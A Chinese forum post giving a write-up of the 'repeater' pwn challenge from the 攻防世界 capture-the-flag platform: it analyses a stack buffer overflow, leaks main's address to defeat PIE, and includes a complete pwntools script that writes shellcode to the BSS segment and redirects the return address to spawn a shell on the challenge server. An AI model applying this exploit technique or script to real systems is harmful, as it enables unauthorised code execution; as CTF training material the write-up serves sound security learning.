ToB企服应用市场:ToB评测及商务社交产业平台
标题:
攻防世界 repeater 题解
[打印本页]
作者:
丝
时间:
2022-9-17 04:28
标题:
攻防世界 repeater 题解
攻防世界 repeater 题解
查看程序保护情况,开启了PIE,没开NX,RELRO全开。
在ida64中打开分析程序,这道题程序比较简单。可以发现的信息如下:
字符数组s大小为0x20,但可以读入0x40的长度,起始于rbp-30h处(见红框)
变量v5可以控制循环、条件控制输出main函数地址,该变量位于rbp-20h字符数组s空间后(见粉框)
通过字符串s溢出可控制变量v5的值及函数返回地址
程序运行起始可输入数据到内存BSS段(见蓝框)
根据这些信息,这道题的思路就出来了:
程序起始运行,提示输入name时,输入一段shellcode(将存储到byte_202040处)
通过字符串s溢出控制变量v5的值为3281697,从而泄露出main函数地址
通过main函数地址及byte_202040与main地址偏移,获得shellcode代码地址
构造溢出输入,覆盖返回地址,使程序跳转到shellcode执行,获得系统shell
这道题还是非常简单的,只是我在做的时候shellcode没选对,导致一直没利用成功(忘记改arch值)。
下面是这道题的完整代码:
from pwn import *
sh = remote('61.147.171.105',50187)
# 通过输入name向BSS段写入shellcode
context.arch = 'amd64'
shellcode = asm(shellcraft.sh())
sh.sendlineafter('name :',shellcode)
# 通过输入内容溢出修改控制变量值,泄露main地址
num = 3281697
payload = b'A'*0x20 + p64(num)
sh.sendlineafter('input :',payload)
sh.recvuntil('you :\n0x')
main_addr = int(sh.recv(12),16)
# 再次通过输入内容溢出,将函数返回地址改为shellcode地址
shellcode_addr = main_addr + 0x202040 - 0xa33
payload2 = b'A'*0x20 + p64(0x1) + b'B'*16 + p64(shellcode_addr)
sh.sendlineafter('input :',payload2)
sh.interactive()
复制代码
执行结果如图:
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!
欢迎光临 ToB企服应用市场:ToB评测及商务社交产业平台 (https://dis.qidao123.com/)
Powered by Discuz! X3.4
